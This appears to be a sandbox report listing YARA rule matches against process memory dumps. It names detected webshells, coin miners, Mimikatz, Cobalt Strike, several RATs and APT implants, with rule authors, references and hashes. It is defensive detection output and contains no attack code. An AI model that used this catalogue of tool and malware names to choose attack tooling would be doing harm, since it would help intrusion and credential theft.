Source: 00000026.00000003.18339634370.00000138BD24F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b
Source: 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_known_webshell date = 2021/01/09, author = Arnim Rupp, description = Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 7b6471774d14510cf6fa312a496eed72b614f6fc
Source: 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Oilrig_IntelSecurityManager date = 2018-01-19, author = Eyal Sela, description = Detects OilRig malware, reference = Internal Research
Source: 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18303554710.00000138BE851000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18345693514.00000138BE774000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000026.00000003.18329040392.00000138BCB04000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18415619805.00000138BD881000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18415619805.00000138BD881000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 00000026.00000003.18344277872.00000138BE12C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000026.00000003.18344277872.00000138BE12C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000026.00000003.18409070283.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18409070283.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18323946155.00000138BDB98000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000026.00000003.18417573092.00000138BD8B1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18417573092.00000138BD8B1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18352509630.00000138BD16D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18330827201.00000138BE3D8000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18410085130.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18410085130.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PoisonIvy_3 filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, cape_type = PoisonIvy Payload, ref = http://malwareconfig.com/stats/PoisonIvy
Source: 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000026.00000003.18408563136.00000138BD8B1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18408563136.00000138BD8B1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp, type: MEMORY	Matched rule: korlia author = Nick Hoffman, reference = http://www.morphick.com/resources/lab-blog/curious-korlia, company = Morphick, information = korlia malware found in apt dump
Source: 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000026.00000003.18418537892.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18418537892.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000001.00000003.14714384382.000002DEA1411000.00000004.00000001.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HackTool_MSIL_SharPersist_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 98ecf58d48a3eae43899b45cec0fc6b7
Source: 00000026.00000003.18324581744.00000138BDC1C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 00000026.00000003.18423541232.00000138BD8B1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18423541232.00000138BD8B1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18330538197.00000138BE396000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18316462962.00000138BD524000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT9002Strings author = Seth Hardy, description = 9002 Identifying Strings, last_modified = 2014-06-25
Source: 00000026.00000003.18340288495.00000138BCB46000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18357503095.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18424893452.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18424893452.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18297877287.00000138BE565000.00000004.00000001.sdmp, type: MEMORY	Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 00000026.00000003.18297877287.00000138BE565000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp, type: MEMORY	Matched rule: ZxShell_Jul17 date = 2017-07-08, hash1 = 5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16, author = Florian Roth, description = Detects a ZxShell - CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp, type: MEMORY	Matched rule: gh0st author = https://github.com/jackcr/
Source: 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_sql date = 2021/03/14, author = Arnim Rupp, description = ASP webshell giving SQL access. Might also be a dual use tool., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
